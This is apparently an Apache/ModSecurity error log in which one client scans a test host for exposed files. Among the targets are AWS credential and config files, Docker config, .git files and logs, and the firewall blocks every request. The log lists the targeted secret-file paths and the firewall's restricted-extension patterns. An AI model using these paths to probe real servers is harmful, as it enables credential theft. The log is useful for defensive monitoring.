[Thu Jan 01 09:26:35.486743 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.486930 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/debug.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.568890 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.569245 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.569402 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtgAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.651973 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.652363 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.652525 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/errors.log"] [unique_id "aVYvu_8XCgNe-1KotIuGtwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.901015 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_errors.log"] [unique_id "aVYvu_8XCgNe-1KotIuGugAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.901410 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_errors.log"] [unique_id "aVYvu_8XCgNe-1KotIuGugAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.901582 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_errors.log"] [unique_id "aVYvu_8XCgNe-1KotIuGugAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.983908 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aVYvu_8XCgNe-1KotIuGuwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.984260 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aVYvu_8XCgNe-1KotIuGuwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:35.984433 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_error.log"] [unique_id "aVYvu_8XCgNe-1KotIuGuwAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:36.066921 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aVYvvP8XCgNe-1KotIuGvAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:36.067163 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aVYvvP8XCgNe-1KotIuGvAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:36.067323 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aVYvvP8XCgNe-1KotIuGvAAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:36.149766 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aVYvvP8XCgNe-1KotIuGvQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:36.150026 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aVYvvP8XCgNe-1KotIuGvQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:36.150211 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aVYvvP8XCgNe-1KotIuGvQAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:37.740609 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aVYvvf8XCgNe-1KotIuG0AAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:37.740850 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aVYvvf8XCgNe-1KotIuG0AAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:37.741103 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aVYvvf8XCgNe-1KotIuG0AAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:37.823429 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aVYvvf8XCgNe-1KotIuG0QAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:37.823677 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aVYvvf8XCgNe-1KotIuG0QAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:37.823839 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "aVYvvf8XCgNe-1KotIuG0QAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.073211 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVYvvv8XCgNe-1KotIuG1AAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.073444 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVYvvv8XCgNe-1KotIuG1AAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.073624 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVYvvv8XCgNe-1KotIuG1AAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.156076 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aVYvvv8XCgNe-1KotIuG1QAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.156306 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aVYvvv8XCgNe-1KotIuG1QAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.156469 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aVYvvv8XCgNe-1KotIuG1QAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.238816 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase ".gitconfig" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitconfig found within REQUEST_FILENAME: /.gitconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitconfig"] [unique_id "aVYvvv8XCgNe-1KotIuG1gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.239043 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitconfig"] [unique_id "aVYvvv8XCgNe-1KotIuG1gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.239190 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.gitconfig"] [unique_id "aVYvvv8XCgNe-1KotIuG1gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.823925 2026] [authz_core:error] [pid 1117410] [client 54.75.202.236:53998] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess, referer: https://www.google.com/
[Thu Jan 01 09:26:38.906139 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname 